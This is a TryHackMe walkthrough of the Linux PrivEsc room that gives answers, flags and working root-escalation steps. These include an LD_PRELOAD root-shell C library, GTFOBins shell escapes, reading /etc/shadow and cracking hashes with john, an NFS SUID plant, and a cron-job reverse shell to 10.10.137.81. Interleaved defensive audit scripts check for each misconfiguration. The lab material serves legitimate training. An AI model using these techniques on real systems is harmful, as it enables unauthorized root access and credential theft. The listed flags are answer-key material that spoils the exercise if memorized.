TryHackMe — Jr Penetration Tester — Privilege Escalation — Linux PrivEsc
Room 1 — Linux PrivEsc
Task 1 Introduction
Read-only task!!
Task 2 What is Privilege Escalation?
Read-only task!!
Task 3 Enumeration
Answer the questions below
Q 1. What is the hostname of the target system?
Ans. wade7363
Q 2. What is the Linux kernel version of the target system?
Ans. 3.13.0-24-generic
Q 3. What Linux is this?
Ans. Ubuntu 14.04 LTS
Q 4. What version of the Python language is installed on the system?
Ans. 2.7.6
Q 5. What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)
Ans. CVE-2015-1328
Task 4 Automated Enumeration Tools
Read-only task!!
Task 5 Privilege Escalation: Kernel Exploits
Statement: Note: Launch the target machine attached to this task to follow along.
You can launch the target machine and access it directly from your browser.
Alternatively, you can access it over SSH with the low-privilege user credentials below:
Username: karen
Password: Password1
Search for the exploit on Google.
Download the exploit to the attacker machine, start a web server there with python3 -m http.server, and transfer the file to the target machine with wget.
Hint: find a folder on the target to which all users have read, write and execute access.
After transferring the exploit to the target machine, compile it with gcc <transferred file name> -o <exploit name>.
Now check id; it will show karen.
Run the exploit: ./<exploit name>
Check id again; we now have root rights.
Q 1. What is the content of the flag1.txt file?
Ans. THM-28392872729920
Task 6 Privilege Escalation: Sudo
Answer the questions below
Solution 1: using https://gtfobins.github.io/
https://gtfobins.github.io/ is a valuable source that provides information on how any program on which you may have sudo rights can be used.
As we know, user karen has three programs on the target system with sudo rights.
Let's check with nano.
Just search for nano at https://gtfobins.github.io/; it has a section named sudo, let's check it.
Now let's run "sudo nano" on the target machine.
Now press Ctrl+R,
then Ctrl+X to move to the "execute a command" mode.
Now we are in the "execute a command" mode.
Now run the command reset; sh 1>&0 2>&0 as described on GTFOBins.
Now we have a shell; let's check the user id.
Let's capture the flag.
Solution 2: following the task info
The steps of this privilege escalation vector can be summarized as follows:
- Check for LD_PRELOAD (with the env_keep option)
- Write a simple C program compiled as a shared object (.so extension) file
- Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
The C code will simply spawn a root shell and can be written as follows:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid() and setuid() are declared here */

/* _init runs as soon as the dynamic linker loads the shared object */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell is not preloaded again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
We need to run the program by specifying the LD_PRELOAD option, as follows:
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
This will result in a shell spawned with root privileges.
Q 1. How many programs can the user “karen” run on the target system with sudo rights?
Q 2. What is the content of the flag2.txt file?
Ans. THM-402028394
Q 3. How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
Ans. sudo nmap --interactive
Q 4. What is the hash of frank’s password?
Ans. $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1
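From the defender's side, the two conditions this task relies on (env_keep passing LD_PRELOAD through sudo, and sudo rights on programs with a shell escape) can be checked in a sudoers file. The script below is an added example, not part of the room or this writeup; the sudoers fragment is constructed, and the list of shell-escape programs is my own assumption.

```shell
#!/bin/sh
# Added example, not from the TryHackMe room: audit sudoers text for the two
# conditions this task relies on, env_keep passing LD_PRELOAD through sudo and
# sudo rules on programs that offer a shell escape. Reads from stdin, so it
# runs on the constructed sample below or on the real /etc/sudoers.
# Programs with a documented shell escape when run under sudo (the three this
# room uses plus common editors and interpreters); extend to taste.
SHELL_ESCAPE_BINS="nano vim vi find nmap less more awk perl python python3 env"

audit_sudoers() {   # sudoers text on stdin, one finding per output line
    awk -v bins="$SHELL_ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    /^Defaults/ && /env_keep/ && /LD_PRELOAD|LD_LIBRARY_PATH/ {
        print "HIGH: env_keep preserves a dynamic-loader variable across sudo"; next
    }
    /^Defaults/ && /!env_reset/ {
        print "HIGH: env_reset is disabled, the caller environment reaches sudo commands"; next
    }
    /^Defaults/ { next }
    {
        user = $1
        spec = $0; sub(/^[^=]*=/, "", spec)           # keep "(runas) TAG: cmd, cmd"
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "", spec)      # drop the (runas) part
        nopass = (spec ~ /NOPASSWD:/) ? " without a password" : ""
        sub(/^([A-Z]+:[ \t]*)+/, "", spec)            # drop tags such as NOPASSWD:
        ncmd = split(spec, cmds, /,[ \t]*/)
        for (i = 1; i <= ncmd; i++) {
            cmd = cmds[i]; sub(/[ \t].*$/, "", cmd)   # binary path without arguments
            base = cmd; sub(/.*\//, "", base)
            if (cmd == "ALL")
                print "INFO: " user " has unrestricted sudo" nopass
            else if (base in risky)
                print "MEDIUM: " user " may run " cmd " via sudo" nopass " (shell escape documented on GTFOBins)"
        }
    }'
}

# Constructed sudoers fragment modelled on the room (karen: find, less, nano).
sample_sudoers() {
    cat <<'EOF'
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD"
root    ALL=(ALL:ALL) ALL
karen   ALL=(ALL) NOPASSWD: /usr/bin/find, /usr/bin/less, /usr/bin/nano
EOF
}

sample_sudoers | audit_sudoers
```

On a real box, run it as sudo cat /etc/sudoers | audit_sudoers (and the same for each file under /etc/sudoers.d).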
Task 7 Privilege Escalation: SUID
Answer the questions below
Q 1. Which user shares the name of a great comic book writer?
Ans. gerryconway
Just use cat /etc/passwd and the hit-and-trial method.
Q 2. What is the password of user2?
Ans. Password1
Solution: Now we need to do a privilege escalation.
Now we know that we can check SUID functions on GTFOBins.
Much of Linux privilege control relies on controlling the interactions between users and files. This is done with permissions. By now, you know that files can have read, write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.
You will notice these files have an "s" bit set showing their special permission level.
find / -type f -perm -04000 -ls 2>/dev/null
will list files that have the SUID bit set (mode 04000; the SGID bit is 02000, so search for -perm -02000 to list those as well).
Let's run this: find / -type f -perm -04000 -ls 2>/dev/null
We see /usr/bin/base64 in the list; we can use this for our privilege escalation.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
We got user2's password hash; cracking it with john gives the password.
Q 3. What is the content of the flag3.txt file?
Ans. THM-3847834
Task 8 Privilege Escalation: Capabilities
Q 1. How many binaries have set capabilities?
Ans. 6
Q 2. What other binary can be used through its capabilities?
Ans. view
Q 3. What is the content of the flag4.txt file?
Ans. THM-9349843
Search the capabilities section for view (vim) on GTFOBins.
Now run the command below: /home/ubuntu/view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
After this we get a new shell.
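The listings that Task 7 (SUID) and Task 8 (capabilities) start from are the same ones an administrator should review regularly. The script below is an added example, not part of the room or this writeup; the getcap output, the SUID listing and the baseline are all constructed, and the set of root-equivalent capabilities is my own choice.

```shell
#!/bin/sh
# Added example, not from the TryHackMe room: review the two listings behind
# Tasks 7 and 8. audit_caps reads "getcap -r / 2>/dev/null" output and flags
# root-equivalent capabilities and binaries outside the system bin directories
# (the /home/ubuntu/view case); audit_suid compares a "find / -type f -perm
# -4000" listing with a baseline the admin maintains.
# Capabilities that let a process become root or read any file outright.
ROOT_EQUIV_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

# Handles both getcap formats: "path = caps+ep" (older libcap) and "path caps=ep".
audit_caps() {   # getcap lines on stdin
    awk -v caps="$ROOT_EQUIV_CAPS" '
    BEGIN { n = split(caps, c, " "); for (i = 1; i <= n; i++) danger[c[i]] = 1 }
    NF < 2 { next }
    {
        path = $1
        for (f = 2; f <= NF; f++) {
            if ($f == "=") continue
            spec = $f; sub(/[=+-].*$/, "", spec)      # strip flags, keep the names
            m = split(spec, names, ",")
            for (i = 1; i <= m; i++)
                if (names[i] in danger) print "HIGH: " path " carries " names[i]
        }
        if (path !~ /^\/(usr\/)?s?bin\//)
            print "NOTE: " path " is outside the system binary directories"
    }'
}

# Anything SUID that is not in the baseline is a candidate for "chmod u-s".
audit_suid() {   # $1 = baseline (one path per line), current listing on stdin
    base=$(mktemp); cur=$(mktemp)
    printf '%s\n' "$1" | sort -u > "$base"
    sort -u > "$cur"
    comm -13 "$base" "$cur" | sed 's/^/UNEXPECTED SUID: /'
    rm -f "$base" "$cur"
}

# Constructed sample data modelled on the room.
sample_getcap() {
    printf '%s\n' '/usr/bin/ping = cap_net_raw+ep' '/usr/bin/mtr-packet = cap_net_raw+ep' \
        '/home/ubuntu/view = cap_setuid+ep'
}
SUID_BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su'
sample_suid_listing() { printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/base64; }

sample_getcap | audit_caps
sample_suid_listing | audit_suid "$SUID_BASELINE"
```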
Task 9 Privilege Escalation: Cron Jobs
Now modify the backup.sh script run by the cron job to start a reverse shell:
bash -i >& /dev/tcp/10.10.137.81/4242 0>&1
Hint: don't forget to give backup.sh execute (+x) rights.
Now run a listener on the attacker machine and wait for around 1 to 2 minutes.
Q 1 .How many cron jobs can you see on the target system?
Ans. 4
Q 2. What is the content of the flag5.txt file?
Ans. THM-383000283
Q 3. What is Matt’s password?
Ans. 123456
cat /etc/shadow: we got the password hash.
Now we can crack it using John:
sudo john p1.txt --wordlist=/usr/share/wordlists/rockyou.txt
sudo john --show p1.txt
Task 10 Privilege Escalation: PATH
Be sure you can answer the questions below before trying this.
- What folders are located under $PATH?
- Does your current user have write privileges for any of these folders?
- Can you modify $PATH?
- Is there a script/application you can start that will be affected by this vulnerability?
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
$ nano thm
$ echo “/bin/bash” > thm
$ chmod 777 thm
$ ls -l thm
$ ./thm
Answer the questions below
Q 1. What is the odd folder you have write access for?
Ans. /home/murdoch
Q 2. Exploit the $PATH vulnerability to read the content of the flag6.txt file.
Ans. read only!!
Q 3. What is the content of the flag6.txt file?
Ans. THM-736628929
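Both Task 9 (a cron job whose script others can edit) and Task 10 (a writable folder on $PATH) come down to the same permission check, so here is one audit script for both. It is an added example, not part of the room or this writeup; the crontab lines and the scratch directory tree are constructed, with antivirus.sh deliberately missing.

```shell
#!/bin/sh
# Added example, not from the TryHackMe room: the checks behind Tasks 9 and 10.
# audit_crontab flags /etc/crontab entries whose script is missing, writable by
# others, or a bare name resolved through PATH; audit_path flags PATH entries
# that others can write to (the /home/murdoch case). Permissions come from the
# filesystem, so make_sample_tree builds a scratch tree to run against.
writable_by_others() {   # true when $1 exists and has group- or world-write set
    [ -e "$1" ] || return 1
    mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1")
    [ $(( 0$mode & 022 )) -ne 0 ]
}
audit_crontab() {   # /etc/crontab text (min hour dom mon dow user command) on stdin
    while read -r line; do
        case "$line" in ''|'#'*|*=*) continue ;; esac   # comments and VAR= lines
        set -f; set -- $line; set +f                    # -f: the * fields must not glob
        [ $# -ge 7 ] || continue
        user=$6; cmd=$7
        case "$cmd" in
            /*) if [ ! -e "$cmd" ]; then
                    echo "MISSING: $cmd (cron, $user) does not exist; a writable parent dir lets anyone supply it"
                elif writable_by_others "$cmd"; then
                    echo "WRITABLE: $cmd (cron, $user) can be edited by others"
                fi ;;
            *)  echo "RELATIVE: $cmd (cron, $user) is looked up through PATH" ;;
        esac
    done
}
audit_path() {   # $1 = a PATH string
    printf '%s\n' "$1" | tr ':' '\n' | while read -r dir; do
        [ -n "$dir" ] || dir=.                          # empty component means cwd
        if writable_by_others "$dir"; then echo "WRITABLE DIR: $dir"; fi
    done
}
# Constructed scratch tree modelled on the room; prints its location.
make_sample_tree() {
    t=$(mktemp -d)
    printf '#!/bin/bash\n' > "$t/backup.sh";   chmod 777 "$t/backup.sh"
    printf '#!/bin/bash\n' > "$t/compress.sh"; chmod 755 "$t/compress.sh"
    mkdir "$t/murdoch"; chmod 777 "$t/murdoch"
    printf '%s\n' "$t"
}
sample_crontab() {   # $1 = scratch tree; antivirus.sh is deliberately absent
    printf '* * * * * root %s\n' "$1/backup.sh" "$1/compress.sh" "$1/antivirus.sh" overwrite.sh
}
T=$(make_sample_tree)
sample_crontab "$T" | audit_crontab
audit_path "/usr/bin:$T/murdoch"
rm -rf "$T"
```

On a real system, feed it with audit_crontab < /etc/crontab and audit_path "$PATH"; the fix for each finding is chmod o-w (or removing the stale entry), not a new cron job.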
Task 11 Privilege Escalation: NFS
Answer the questions below
Q 1. How many mountable shares can you identify on the target system?
Ans. 3
Q 2. How many shares have the “no_root_squash” option enabled?
Ans. 3
Q 3. What is the content of the flag7.txt file?
Ans. THM-89384012
Solution: The critical element for this privilege escalation vector is the "no_root_squash" option you can see above. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the "no_root_squash" option is present on a writable share, we can create an executable with the SUID bit set and run it on the target system.
We will start by enumerating mountable shares from our attacking machine.
We will mount one of the “no_root_squash” shares to our attacking machine and start building our executable.
sudo mount -o rw 10.10.208.235:/home/ubuntu/sharedfolder /tmp/Share_at_target_machine/
Once we compile the code we will set the SUID bit.
sudo gcc nfs.c -o nfs -w
We will see below that both files (nfs.c and nfs) are present on the target system; we have worked on the mounted share, so there was no need to transfer them.
Notice the nfs executable has the SUID bit set on the target system and runs with root privileges.
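The whole vector hinges on a single word in /etc/exports, which makes it easy to audit and easy to fix. The script below is an added example, not part of the room or this writeup; the exports file is constructed, modelled on the three no_root_squash shares the questions above count.

```shell
#!/bin/sh
# Added example, not from the TryHackMe room: find the condition this task
# depends on in /etc/exports text. audit_exports reports each share exported
# with no_root_squash (and whether it is rw); harden_exports shows the fix,
# which is just putting root_squash (the NFS default) back. An exports line
# looks like "<path> <client>(opt,opt,...) <client>(opt,...) ...".
audit_exports() {   # exports text on stdin
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    {
        share = $1
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            if (match(client, /\(.*\)/)) {                 # split "client(opts)"
                opts = substr(client, RSTART + 1, RLENGTH - 2)
                client = substr(client, 1, RSTART - 1)
            }
            if (client == "") client = "*"                 # bare "(opts)" means any host
            o = "," opts ","                               # so /,x,/ matches a whole option
            if (o ~ /,no_root_squash,/) {
                mode = (o ~ /,rw,/) ? "rw" : "ro"
                print "HIGH: " share " exported " mode " to " client " with no_root_squash"
                if (mode == "rw" && client == "*")
                    print "      any NFS client can leave a root-owned SUID file on " share
            }
        }
    }'
}
# Replace no_root_squash with root_squash everywhere; output is the fixed text.
harden_exports() {   # exports text on stdin
    sed 's/no_root_squash/root_squash/g'
}
# Constructed /etc/exports modelled on the room.
sample_exports() {
    cat <<'EOF'
# /etc/exports: constructed sample
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public 10.0.0.0/24(ro,sync)
EOF
}
sample_exports | audit_exports
echo "--- after harden_exports ---"
sample_exports | harden_exports | audit_exports
```

After editing the real file, run exportfs -ra so the server re-reads it; on the client side, mounting with the nosuid option stops a planted SUID file from taking effect even when the export is misconfigured.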
Task 12 Capstone Challenge
Now you have a fairly good understanding of the main privilege escalation vectors on Linux, and this challenge should be fairly easy.
Use whatever we have learned so far in this room.
Answer the questions below
Q 1. What is the content of the flag1.txt file?
Ans. THM-42**871**20544
Q 2. What is the content of the flag2.txt file?
Ans. THM-16**247823**238
If anyone needs any explanation or help, please message!!
Thank you!! Happy hacking!!